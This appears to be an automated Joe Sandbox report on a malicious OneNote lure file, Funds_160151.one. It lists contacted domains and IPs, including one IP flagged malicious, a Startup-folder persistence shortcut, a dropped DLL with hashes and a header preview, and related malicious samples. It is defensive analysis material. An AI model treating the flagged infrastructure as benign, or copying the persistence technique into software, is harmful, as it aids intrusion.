https://res.getmicrosoftkey.com/api/redemptionevents	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://powerlift-frontdesk.acompli.net	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://start.microsoftapp.net/start?pc_campaign=UHF_Banner_15mkts&adjust=y9xgnyl_5sblqid"	de-ch[1].htm.16.dr	false	Avira URL Cloud: safe	unknown
https://tasks.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://officeci.azurewebsites.net/api/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.scheduler.	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://my.microsoftpersonalcontent.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/about/de-ch/	de-ch[1].htm.16.dr	false		high
https://store.office.cn/addinstemplate	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://api.aadrm.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://globaldisco.crm.dynamics.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://messaging.engagement.office.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://dev0-api.acompli.net/autodetect	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://www.odwebp.svc.ms	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://web.microsoftstream.com/video/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://schema.org	de-ch[1].htm.16.dr	false		high
https://graph.windows.net	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://dataservice.o365filtering.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://officesetup.getmicrosoftkey.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://analysis.windows.net/powerbi/api	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://consent.config.office.com/consentcheckin/v1.0/consents	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://d.docs.live.net	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://ncus.contentsync.	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://www.linkedin.com/company/1035	de-ch[1].htm.16.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
http://weather.service.msn.com/data.aspx	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://apis.live.net/v5.0/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
http://schema.org/Organization	de-ch[1].htm.16.dr	false		high
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://messaging.lifecycle.office.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://pushchannel.1drv.ms	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://management.azure.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://outlook.office365.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://login.windows.net	App_1675800120151438600_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log.0.dr	false		high
https://wus2.contentsync.	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://incidents.diagnostics.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://make.powerautomate.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/odc/insertmedia	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://api.office.net	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://incidents.diagnosticssdf.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://www.skype.com/de/	de-ch[1].htm.16.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://aka.ms/pscore6	powershell.exe, 00000009.00000002.2654006199.0000021A0C5D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://entitlement.diagnostics.office.com	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://substrate.office.com/search/api/v2/init	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://outlook.office.com/	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.236.146.31	unknown	United Kingdom		8530	EXCELLGB	true
197.0.104.172	unknown	Tunisia		37705	TOPNETTN	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800800
Start date and time:	2023-02-07 20:00:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Funds_160151.one
Detection:	MAL
Classification:	mal100.troj.expl.evad.winONE@19/732@0/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 18.1% (good quality ratio 14.2%) Quality average: 64.8% Quality standard deviation: 38.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 31 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .one Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.8.86, 52.113.194.132, 20.42.65.90, 20.103.85.33, 20.84.181.62, 20.53.203.50, 20.81.111.85, 20.112.52.29, 2.18.233.62
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, e13678.dscb.akamaiedge.net, onedscolprdeus14.eastus.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, login.live.com, officeclient.microsoft.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, wdcpalt.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, microsoft.com, nexusrules.officeapps.live.com, www.microsoft.com, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:02:05	API Interceptor	9x Sleep call for process: powershell.exe modified
20:02:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
20:02:15	API Interceptor	9x Sleep call for process: backgroundTaskHost.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
EXCELLGB	DocumentsFolder_884996(Feb03).one	Get hash	malicious	Browse	87.236.146.112
	jeNRTPKVG9.elf	Get hash	malicious	Browse	93.115.176.199
	7bqD5t9J5I.exe	Get hash	malicious	Browse	87.236.161.20
	4eIGP3BjEw.exe	Get hash	malicious	Browse	87.236.161.20
	qqiOLQZ0Pc.exe	Get hash	malicious	Browse	87.236.161.20
	SecuriteInfo.com.Variant.Lazy.229565.27362.exe	Get hash	malicious	Browse	87.236.167.227
	DOCUMENT.EXE	Get hash	malicious	Browse	87.236.167.227
	ACH_221515_Payment_Advice.xls	Get hash	malicious	Browse	87.236.167.249
	PmRmvXSAiJ.dll	Get hash	malicious	Browse	5.39.183.77
	miori.x86	Get hash	malicious	Browse	93.115.176.191
	sora.arm	Get hash	malicious	Browse	93.115.176.195
	Payment receipt z.exe	Get hash	malicious	Browse	87.236.167.237
	Cancellation-507660980$-May5.xlsb	Get hash	malicious	Browse	87.236.146.153
	Cancellation-507660980$-May5.xlsb	Get hash	malicious	Browse	87.236.146.153
	https://birdboxonline.com/Secured/	Get hash	malicious	Browse	87.236.167.237
	REJ-822732480-Apr-12.xlsb	Get hash	malicious	Browse	87.236.146.116
	REJ-822732480-Apr-12.xlsb	Get hash	malicious	Browse	87.236.146.116
	REJ-452082288-Apr-12.xlsb	Get hash	malicious	Browse	87.236.146.116
	REJ-452082288-Apr-12.xlsb	Get hash	malicious	Browse	87.236.146.116
	loligang.arm7	Get hash	malicious	Browse	185.182.19.211

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\e77242d6.dll	Note.one	Get hash	malicious	Browse
	Document.one	Get hash	malicious	Browse
	notes.one	Get hash	malicious	Browse
	qopceyu.dll	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	06mNIWJoVz.exe	Get hash	malicious	Browse
	5W8kRNoAdB.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	RS9009.img	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	Grant#2929.html	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	RFSL#6617.img	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	dBDfcVVkIk.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\gb.jpg

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.467980501586254
Encrypted:	false
SSDEEP:	96:M4bUSkJLZevpB01M45B7rvAHl1uaL2JZ3KeopG3YxDgglBdN:lnX23zMG3YxBdN
MD5:	FFD8F30A0E9E989B1EECE2153710E605
SHA1:	1859A59C4123596702E9ECD1EB4CB4FEE3DD8BFB
SHA-256:	99380A83C65D0E9333B62BD487B96E011070FCE7FE74598BA484383F19AADDBF
SHA-512:	3B7FA1E57D417F35CF2BF051B1F297F01FC9F3A8D2D5FD4FD9B3FA61B85EB4CA4202531FDC4FDD85625828C07FB2332FA9687FB8DDA6AFEBA5D8CABA47421699
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..... ...................0....4i................................ym....@... .........................5.......................................\...................................................................................text...4........ ..................`.P`.data........0.......$..............@.`..rdata...u...@...v...&..............@.`@.bss..................................`..edata..5...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls....v...........................@.0..reloc..\............\..............@.0B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1E906F6A-A954-476D-9938-3DC6D5700ACA

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	153877
Entropy (8bit):	5.353837193474
Encrypted:	false
SSDEEP:	1536:h+C7/gjDB6B9guwULQ9DQN+zezQKk4F77nXmvid8XR3EwrNz6I:wmQ9DQN+zezIX+g
MD5:	3918CB744305B279F9C2C4424CB2FD20
SHA1:	DB1EC235D1D42AB0469ABF9F6A10194FBFD5B4C1
SHA-256:	D2C76A7C049E674095D43D0E954A1EA70E1F18764B149EF57780A9A2536DA685
SHA-512:	8E5191FE142F2F94A608E638A6E919AF962202DC9F42BD9B4A859B07EEB4C3E939CB7419E9FCC6D841CECFC1A7EDE1B4230C419D347AD9DCCE5ED662DD15360D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-02-07T19:02:00">.. Build: 16.0.16130.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	289664
Entropy (8bit):	5.151340981300995
Encrypted:	false
SSDEEP:	1536:42/zodZIr6KPZ01u6uSivsUQK75IthMfK2Xua:Vrr6KPZ01u6uSivsUQK75IthQXN
MD5:	9C1A32F9C78C1998FD5E8CC83A9F2593
SHA1:	470AD5B6F44DA93A3632D4DA24DAEC72C3DE23F8
SHA-256:	67C716256C7FC67D6AA08DFB2FADF131874D0740771789D71744C45824327CD2
SHA-512:	190E7991DC9348ED2AA2F9DBF01CD3844040147D9B84316761CF6332F17A7F40FB0A0A7338660EEBD2FF2FAD7DD90EA6A9268B85E675562DFE901E3673FA427B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.09216609452072291
Encrypted:	false
SSDEEP:	3:lSWFN3l/klslpF/4llfll:l9F8E0/
MD5:	F138A66469C10D5761C6CBB36F2163C3
SHA1:	EEA136206474280549586923B7A4A3C6D5DB1E25
SHA-256:	C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
SHA-512:	9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
Malicious:	false
Preview:	SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	4616
Entropy (8bit):	0.13154583799826006
Encrypted:	false
SSDEEP:	3:7FEG2l+vysH/FllkpMRgSWbNFl/sl+ltlslVlllfllvW:7+/lpSg9bNFlEs1EP//W
MD5:	33892E68D55017DACCB2988360206DB7
SHA1:	3A1D33E742C168D48FC7F5480E5C06F12B62C269
SHA-256:	75C361626778D8C603780D5B86945B60D2CB1040B0DEAB9C7ECA9EED0D927278
SHA-512:	FF38F80F025CBC5D5C0B5093C142E94BF575E8015846D3783602E5682E4E39E90E474C458D983EB6E96ECD2B1A5B86FB8416EFB9793C8F2396435BA8E6A12C82
Malicious:	false
Preview:	.... .c.....w..3....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.04462234229792196
Encrypted:	false
SSDEEP:	3:G4l2gcOWkfHYAl2gcOWkHlmlL9//Xlvlll1lllwlvlllglbXdbllAlldl+l:G4l2gceVl2gcekL9XXPH4l942U
MD5:	7A1A374B214FAF0FF62035E273F8F6DF
SHA1:	CFE41531A18FD654D5FD3AD41B9B9E11C0A39724
SHA-256:	5554DBF117A9FFA89F650D286E44980CDCED33E9CDBFAFB696D08607DEE09465
SHA-512:	5AE9C2FA7DE1FE512C0FB8112F31DEB12E9DCCBDCA1DC5A26BB2E376C933401AAF5A4ABF9E390C314642D80A5B779D2D5C43F92F310D37CCFA045184A15D7ABC
Malicious:	false
Preview:	..-.....................t. .=...N+.6,s6r(...OUS,..-.....................t. .=...N+.6,s6r(...OUS,........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	45352
Entropy (8bit):	0.3918091174281439
Encrypted:	false
SSDEEP:	24:KBwabyQ3zRD03dUll7DBtDi4kZERDBDm2yzqt8VtbDBtDi4kZERDh/a:cwabyQ1YtUll7DYMdmTzO8VFDYMl/a
MD5:	71AE4FABDD7D2DD3D55B187F93ED4EDE
SHA1:	3C7FC9D7D9E434E599DBAB3B9DAB5887071169E0
SHA-256:	4CB2CC2E59055A4ECAC62503B675297CE60C029BD58FF597C03175C897ECC0AA
SHA-512:	C4A727A9C2BCFDFBFBB3E8F917903464023490627703245C00A81E4D5475DF47E7FDA4A628CD038268EBA766AFFD654915C447F358FC120E1CCC2D7EFECE0118
Malicious:	false
Preview:	7....-..........N+.6,s6r...a5.y2........N+.6,s6r.V..i>+.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 07-02-2023).one (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.292642489799724
Encrypted:	false
SSDEEP:	12:1iMtYyfnj/UP730FFBtN29VstO/AZ4XviuGu8MtpONzVuiuC:jtYyfnYD3KtN2PstPZ4X628MDONRNF
MD5:	F448AC316F04059ED668B3725504DF0C
SHA1:	F2408B0DAAE08583879F3D3768EF76DBF84EE276
SHA-256:	0FD751D5C21E247084DBDC23C2A34919C9E2AF0F6955DD9515F4037473B86B1B
SHA-512:	206A2A37A7EF56CA824C2673BE1C1A9389CA5F8553004D6AD3D286E28B48B90A553E94AEF47116C69A99AEDDCD25399CDFEE0D7B3B871BCBA9306D7EB4DC22E5
Malicious:	false
Preview:	.R\{..M..Sx.)..l..`.u.@.v.'.=..................?.....I...........................................................................................................h............................................_[.!.AF...2..#G...........M.-.G......%.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.292642489799724
Encrypted:	false
SSDEEP:	12:1iMtYyfnj/UP730FFBtN29VstO/AZ4XviuGu8MtpONzVuiuC:jtYyfnYD3KtN2PstPZ4X628MDONRNF
MD5:	F448AC316F04059ED668B3725504DF0C
SHA1:	F2408B0DAAE08583879F3D3768EF76DBF84EE276
SHA-256:	0FD751D5C21E247084DBDC23C2A34919C9E2AF0F6955DD9515F4037473B86B1B
SHA-512:	206A2A37A7EF56CA824C2673BE1C1A9389CA5F8553004D6AD3D286E28B48B90A553E94AEF47116C69A99AEDDCD25399CDFEE0D7B3B871BCBA9306D7EB4DC22E5
Malicious:	false
Preview:	.R\{..M..Sx.)..l..`.u.@.v.'.=..................?.....I...........................................................................................................h............................................_[.!.AF...2..#G...........M.-.G......%.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\Funds_160151.one (On 07-02-2023).one (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	110992
Entropy (8bit):	7.40798690796541
Encrypted:	false
SSDEEP:	3072:qW0gS2EJbyYeMYkKkyX3DWvLLATidK/rDRg8p:3hjZrHDgCm8p
MD5:	4F4B09B4FDB5BB7A81CB31DF4C2F9451
SHA1:	3866AA42C25BE5C1E942DF0C5523E6008E423DFE
SHA-256:	A78AD35FC84AE586A96807C1BA20EE4A4FC758F61F9C69203C194D793179CF9B
SHA-512:	5187F36AFD79637D102317AAC069EDC0BF31117AB7F3B80EBA9783870CA90AC4EE9403A3D10FBF7C0D16D5C6DE726E3D32F63969D6AF778F7266482895920126
Malicious:	false
Preview:	.R\{..M..Sx.).......{A...f.EHT................?.....I.......................................................................................`#..................h.................................................{K..e.G..#.......9^>3...H.<.8................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Funds_160151.one.onebackupconstruction

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	110992
Entropy (8bit):	7.40798690796541
Encrypted:	false
SSDEEP:	3072:qW0gS2EJbyYeMYkKkyX3DWvLLATidK/rDRg8p:3hjZrHDgCm8p
MD5:	4F4B09B4FDB5BB7A81CB31DF4C2F9451
SHA1:	3866AA42C25BE5C1E942DF0C5523E6008E423DFE
SHA-256:	A78AD35FC84AE586A96807C1BA20EE4A4FC758F61F9C69203C194D793179CF9B
SHA-512:	5187F36AFD79637D102317AAC069EDC0BF31117AB7F3B80EBA9783870CA90AC4EE9403A3D10FBF7C0D16D5C6DE726E3D32F63969D6AF778F7266482895920126
Malicious:	false
Preview:	.R\{..M..Sx.).......{A...f.EHT................?.....I.......................................................................................`#..................h.................................................{K..e.G..#.......9^>3...H.<.8................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000000.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	3.8617129188839936
Encrypted:	false
SSDEEP:	1536:p0ng/LSJnqYzrCIkFvk9kVkNbhiDdk59Uk0wLkn4mqzQ:rCeGNbkD+59F04m
MD5:	4D6B0408A63E86B6B3AAC382399C33DA
SHA1:	8EF473EE62D3A01B1BDB0ECB985803C5989D58D0
SHA-256:	5C6AC3F1E98E85AE99182B02C052F3D7C4C7E78480A6979E412A025135E60D5F
SHA-512:	557575B0B79469A1B7B200FB108F0CFF39CC8AE1A217C68BFB1D5167D45AE8CC895DAF5A25AA57332E68B3D859047EC3F4DAAF8D55B48A909BEA30B052D3B349
Malicious:	false
Preview:	l..@8...l*...v...8B.%......#.....+....H.eNJ.M..........l..@h...(....v...8B.%......#....0....................... ...0...(...........p...........0................?...?...........?................~....<..?..........?..........F..@.........+....H.eNJ.M...............................9.............#..)....Bs4......o..GbF.c..s{..........................l..@.........v...8B.%......#.....?.....................<..?......?..............X<......:>....@.6P^.!.).y.......B&;.m...;.C{.].........`...0...(...........p...........0.........................,.......0...(...........p...........0...........[....>...........f.;..'.....T.Yo....Tx!.sN..&OA....s.....H.................<.................................................................................................................4............5._.G...Wl.L#....0.......06...4..m..h!.<.S^YE..........Xa....@.+D.z..P..... ...U.gV~P...1..48...........^...+C..k.'<.c.....pv..................................................................x.......

